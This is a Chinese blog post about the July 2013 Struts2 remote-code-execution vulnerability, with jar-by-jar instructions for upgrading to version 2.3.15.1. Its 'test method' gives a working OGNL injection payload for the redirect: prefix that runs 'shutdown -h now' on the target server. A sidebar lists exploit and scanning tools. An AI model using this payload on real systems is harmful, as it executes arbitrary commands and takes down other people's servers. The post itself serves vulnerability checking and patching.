struts2 2013年7月份高危漏洞测试及快速解决方法 - - ITeye博客

`

zhimin8haomi

浏览: 13462 次
性别:
来自: 长沙

最近访客更多访客>>

xiaoboss

likejiushilike

午夜梦回奈何天

风一样的吹

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

struts2 2013年7月份高危漏洞测试及快速解决方法

博客分类：

安全漏洞

阅读更多

此次漏洞的严重性不言而喻，几乎所有所有struts2网站，项目无一幸免。

漏洞测试方法：

关闭项目所在linux服务器，在项目任意action地址后追加：

?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'shutdown','-h','now'})).start()}

快速修复方法：

登录Struts2官网，下载struts-2.3.15.1-all.zip；
从struts-2.3.15.1-all\struts-2.3.15.1\lib中拷贝出
（1）javassist-3.11.0.GA.jar

（2）commons-io-2.0.1.jar

（3）commons-lang3-3.1.jar

（4）freemarker-2.3.19.jar

（5）ognl-3.0.6.jar

（6）commons-fileupload-1.3.jar

（7）xwork-core-2.3.15.1.jar

（8）struts2-core-2.3.15.1.jar

（9）struts2-spring-plugin-2.3.15.1.jar
注：保留原有的commons-lang-2.6.jar，其余的替换旧版本。（删除对应旧版本，然后将上述9个Jar包拷贝进去）
重新编译。完毕！

如果所用版本与2.3.15.1相差较多，建议使用新包完全替换旧包。

分享到：

Eclipse使用Maven构建web项目详解 | JEECG

2014-02-10 10:22
浏览 982
评论(0)
分类:编程语言
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Struts2漏洞测试: Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试...

struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞: 2017年7月7日，Apache Struts发布最新的安全公告，Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞，漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为：2.3.x。攻击者可以构造恶意的字段值...

Struts2_s2-016&017&ognl2.6.11_patch漏洞补丁: struts.xml文件中新增以下内容：  <bean type="org.apache.struts2.dispatcher.mapper.ActionMapper" name=...2013年7月25日

关于Apache Struts 2软件存在高危漏洞的紧急通报003: 关于Apache Struts 2软件存在高危漏洞的紧急通报003

全网最全Struts 2 全版本漏洞检测工具，最新struts漏洞更新: Struts 2 全版本漏洞检测工具

Struts 2 全版本漏洞检测工具 18.09 过waf版: 5、作者对不同的struts2漏洞测试语句做了大量修改，执行命令、上传功能已经能通用。 6、支持HTTPS。 7、支持GET、POST、UPLOAD三种请求方法，您可以自由选择。（UPLOAD为Multi-Part方式提交） 8、部分漏洞测试支持...

Struts2远程命令执行漏洞解析: Struts2远程命令执行漏洞解析漏洞解析远程命令 Struts2

Struts2高危漏洞2.3.15.3: Struts2高危漏洞造成大规模的信息泄露，因此需对Struts2相关jar包升级。以下是将struts2相关包由低版本升级至2.3.15.3的步骤。

Struts2漏洞检查工具Struts2.2019.V2.3: Struts2漏洞检查工具Struts2.2019.V2.3

struts1.3.15.1高危漏洞修复版ssh包: ssh1.3.15.1-struts最新高危漏洞修复版ssh整合jar包。解压后直接buildPath.

Struts2漏洞检查工具2019版 V2.3.exe: Struts2漏洞检查工具2019版警告：本工具为漏洞自查工具，请勿非法攻击他人网站！ ==漏洞编号==============影响版本=========================官方公告==========================================影响范围====...

struts漏洞检测工具: struts2 漏洞检测工具，快速检测struts命令执行漏洞，可批量。运行环境要求：MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037...

Struts2 安全漏洞解决方法: Struts2 安全漏洞解析，距离上个版本发布仅仅过去1周，apache struts官网又发布struts2最新版本安全公告，主要修复了一个漏洞，代号S2-022：从漏洞简要描述来看，确定是对之前S2-021的补充。

Struts2低版本安全漏洞及解决办法: Struts2低版本安全漏洞及解决办法 Struts2低版本安全漏洞及解决办法

struts2 最新漏洞 S2-016、S2-017修补方案 .docx: struts2 最新漏洞 S2-016、S2-017修补方案 .docx

Struts2漏洞测试工具: 测试Struts2的漏洞的工具，漏洞是否存在

struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_: struts2-scan 检测struts2漏洞，认证检测struts2漏洞

struts2漏洞利用工具: Struts终极漏洞利用工具 Powered By 独孤城 Thanks to 峙酿君edwardz

Struts2漏洞利用工具: Struts2是一个基于MVC设计模式的Web应用框架，但2存在远程代码执行的漏洞，现在Struts2漏洞检测工具2017版增加S2-046，官方发布S2-046和S2-045漏洞引发原因一样，只是利用漏洞的位置发生了变化，S2-046方式可能绕过...

struts2漏洞修复: 该漏洞影响范围（Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10），漏洞危害程度严重，可造成直接获取应用系统所在服务器的控制权限文件包含ognl-3.0.21.jar，struts2-convention-plugin-2.3.34.jar，...

Global site tag (gtag.js) - Google Analytics